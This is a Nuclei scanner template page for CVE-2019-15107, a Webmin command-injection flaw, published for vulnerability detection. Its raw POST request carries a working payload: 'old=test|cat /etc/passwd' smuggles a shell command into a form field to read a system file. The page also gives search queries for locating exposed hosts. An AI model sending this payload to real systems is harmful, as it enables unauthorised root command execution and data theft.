Skip to content
Nuclei Templates

Webmin <= 1.920 - Unauthenticated Remote Command Execution

ID: CVE-2019-15107

Severity: critical

Author: bp0lr

Tags: cve,cve2019,packetstorm,webmin,rce,kev,edb

Description

Section titled “Description”

Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter ‘old’ in password_change.cgi.

YAML Source

Section titled “YAML Source”
id: CVE-2019-15107


info:
  name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
  author: bp0lr
  severity: critical
  description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with root privileges.
  remediation: |
    Upgrade to Webmin version 1.930 or later to mitigate this vulnerability.
  reference:
    - https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15107
    - https://www.exploit-db.com/exploits/47230
    - http://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
    - http://packetstormsecurity.com/files/154485/Webmin-1.920-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-15107
    cwe-id: CWE-78
    epss-score: 0.97494
    epss-percentile: 0.99975
    cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: webmin
    product: webmin
    shodan-query: http.title:"webmin"
    fofa-query: title="webmin"
    google-query: intitle:"webmin"
  tags: cve,cve2019,packetstorm,webmin,rce,kev,edb


http:
  - raw:
      #
      - |
        POST /password_change.cgi HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Referer: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded


        user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 490a004630440220175ae79f9277edda713305ed663e83b0f4960a5daa9a4a0ec9e3b146af709fa6022005b8ba8878e1502e47fce8bbaf1e6b9dabe59318b9584a8290bab2c7836fe800:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-15107.yaml"

View on Github